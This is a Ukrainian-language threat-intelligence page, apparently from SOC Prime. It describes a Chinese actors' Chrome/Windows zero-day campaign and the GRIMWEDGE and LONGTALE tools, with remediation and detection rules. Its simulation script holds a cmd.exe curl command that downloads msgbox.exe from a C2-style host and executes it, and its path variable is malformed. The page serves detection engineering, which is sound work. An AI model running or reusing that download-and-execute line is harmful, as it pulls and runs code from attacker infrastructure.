SOC Prime Bias: Critical

10 Sep 2026 15:37 UTC

Китайські хакери використовують пов’язані вразливості нульового дня у браузерах та Windows

Author Photo
SOC Prime Team linkedin icon Стежити
Китайські хакери використовують пов’язані вразливості нульового дня у браузерах та Windows
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Два китайських учасники загроз, UTA0560 і JungleBamboo, використовують складний багаторівневий ланцюг експлойтів для атаки на Google Chrome та ядро Windows. Атаки використовують вікно патч-щілини, в якому уразливості фіксуються в Chromium до того, як відповідні оновлення дійдуть до випущених версій Google Chrome. Листи зловмисного фішингу доставляють різні навантаження, включаючи бекдор GRIMWEDGE JScript і розширення LONGTALE для Chrome.

Розслідування

Моніторинг мережевої безпеки Volexity ідентифікував кампанію зловмисного фішингу, націлену на НПО 1 вересня 2026 року. Розслідування виявило загальний ланцюг експлойтів, що включає CVE-2026-85046, CVE-2026-87491 і CVE-2026-85880. Аналітики розділили активність на два кластери: UTA0560, що впроваджує GRIMWEDGE, та JungleBamboo, що використовує SUPERSTOMP для встановлення розширення LONGTALE.

Усунення

Організації повинні утримувати Google Chrome в оновленому стані до останньої доступної версії, щоб зменшити вплив під час періодів патч-щілини. Команди безпеки повинні контролювати незвичну поведінку дочірніх процесів Chrome та несанкціоновані установки розширень Chrome. Також рекомендується потужне фільтрування електронної пошти для захисту від зловмисного фішингу та моніторинг підозрілих або несанкціонованих створень запланованих завдань.

Відповідь

Якщо виявлено експлуатацію, постраждалі хости слід негайно ізолювати, щоб запобігти подальшій командно-контрольній комунікації або латеральному переміщенню. Відповідачі повинні провести форензичний аналіз пам’яті процесів Chrome, щоб ідентифікувати впроваджений шелькод. Встановлені розширення Chrome також слід перевірити, а заплановані завдання переглянути на наявність підозрілих записів, як, наприклад Заплановані системи Windows.

Потік атаки

Ми все ще оновлюємо цю частину.

Виявлення

Підозріла використання CURL (через командний рядок)

Команда SOC Prime
10 вересня 2026

Підозріла командно-контрольна активність через запит DNS із незвичайним доменом верхнього рівня (TLD) (через dns)

Команда SOC Prime
10 вересня 2026

Підозріле заплановане завдання (через аудит)

Команда SOC Prime
10 вересня 2026

IOC (HashSha256) для виявлення: Зверніть увагу на (патч) щілину: ланцюг експлойтів 0-day від декількох китайських суб’єктів загроз у Chrome та Windows

Правила AI SOC Prime
10 вересня 2026

IOC (SourceIP) для виявлення: Зверніть увагу на (патч) щілину: ланцюг експлойтів 0-day від декількох китайських суб’єктів загроз у Chrome та Windows

Правила AI SOC Prime
10 вересня 2026

IOC (DestinationIP) для виявлення: Зверніть увагу на (патч) щілину: ланцюг експлойтів 0-day від декількох китайських суб’єктів загроз у Chrome та Windows

Правила AI SOC Prime
10 вересня 2026

Сторінки приземлення з експлойтів 0-day у Chrome [Веб-сервер]

Правила AI SOC Prime
10 вересня 2026

Виявлення активності бекдора GRIMWEDGE JScript та доставки навантаження [Створення процесу Windows]

Правила AI SOC Prime
10 вересня 2026

Виконання симуляції

  • Оповідь атаки та команди: Зловмисник намагається отримати точку опори на скомпрометованій системі, розгортаючи бекдор GRIMWEDGE JScript. Щоб уникнути виявлення простими антивірусними сигнатурами, атакуючий використовує cmd.exe та вбудовану утиліту curl для завантаження програми-вантажника другого етапу під назвою msgbox.exe з віддаленої інфраструктури команд і управління (C2). Після завершення завантаження зловмисник негайно виконує навантаження з каталогу %TEMP% щоб мінімізувати час перебування файлу на диску та використовувати каталог, який часто залишається поза увагою базового моніторингу. Ця послідовність розроблена, щоб відповідати точному шаблону командного рядка, який шукає правило виявлення.

  • Сценарій регресійного тестування:

    # Сценарій симуляції для спрацювання правила виявлення GRIMWEDGE.
    # Цей сценарій створює фіктивний файл, щоб імітувати завантажене навантаження.
    
    $tempDir = $env:TEMP
    $payloadName = "msgbox.exe"
    $payloadPath = Join-Path $tempDir $payloadName
    
    # 1. Створіть фіктивний файл 'msgbox.exe' для імітації завантаженого навантаження
    # У реальній атаці це був би справжній шкідливий бінарний файл.
    New-Item -Path $payloadPath -ItemType File -Force
    Set-Content -Path $payloadPath -Value "Dummy Payload Content"
    
    # 2. Виконайте точну команду строки, що вказана в логіці виявлення.
    # Примітка: ми використовуємо локальний підхід ехо/мок для URL, щоб гарантувати, що строка команди точно співпадає.
    cmd.exe /c "curl -f -sS -o ""$tempDirmsgbox.exe"" ""https://cloud.shinewrist.net/test/msgbox.exe"" && ""$tempDirmsgbox.exe"""
    
    Write-Host "Симуляцію завершено. Перевірте SIEM на наявність сповіщень, що відповідають паттерну GRIMWEDGE."
  • Команди очищення:

    # Сценарій очищення для видалення змодельованого навантаження та файлів.
    $tempDir = $env:TEMP
    $payloadPath = Join-Path $tempDir "msgbox.exe"
    
    if (Test-Path $payloadPath) {
        Remove-Item -Path $payloadPath -Force
        Write-Host "Очистка успішна: $payloadPath видалено."
    } else {
        Write-Host "Навантаження не знайдено. Очистка не потрібна."
    }